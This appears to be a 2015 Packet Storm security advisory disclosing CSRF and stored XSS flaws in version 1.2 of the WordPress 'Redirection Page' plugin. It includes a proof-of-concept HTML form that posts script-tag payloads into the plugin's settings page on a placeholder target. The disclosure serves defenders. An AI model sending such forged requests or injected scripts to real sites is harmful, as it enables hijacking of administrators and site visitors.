WordPress Redirection Page plugin version 1.2 suffers from cross site request forgery and cross site scripting vulnerabilities.
8708e64c5d3cb9316c397f0b2945cfe98631e0b256cf9d8a44f41d8430029ce5Title: WordPress 'Redirection Page' CSRF/XSS
Version: 1.2
Author: Morten Nørtoft, Kenneth Jepsen, Mikkel Vej
Date: 2015-01-26
Download: https://wordpress.org/plugins/redirection-page/
Contacted WordPress: 2015-01-26
==========================================================
## Plugin description:
==========================================================
Redirect your specified pages, it is usefull when you have 404/not-found pages. Go to Settings Page to start redirection.
## CSRF:
==========================================================
It is possible to change the plugins redirect settings by tricking a logged in admin to visit a crafted page.
## Stored XSS:
==========================================================
Redirect settings from the admin page is stored and shown unsanitized on the plugin's admin page. This allows an attacker to perform XSS through the settings fields.
PoC:
Log in as admin and submit this form:
<form method="POST" action="http://[TARGET]/wp-admin/options-general.php?page=redirection-page&redirectionpage_action=add">
<input type="text" name="source" value=""><script>alert(1);</script>"><br />
<input type="text" name="redir" value=""><script>alert(2);</script>"><br />
<input type="submit">
</form>
## Solution
==========================================================
No fix available.
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed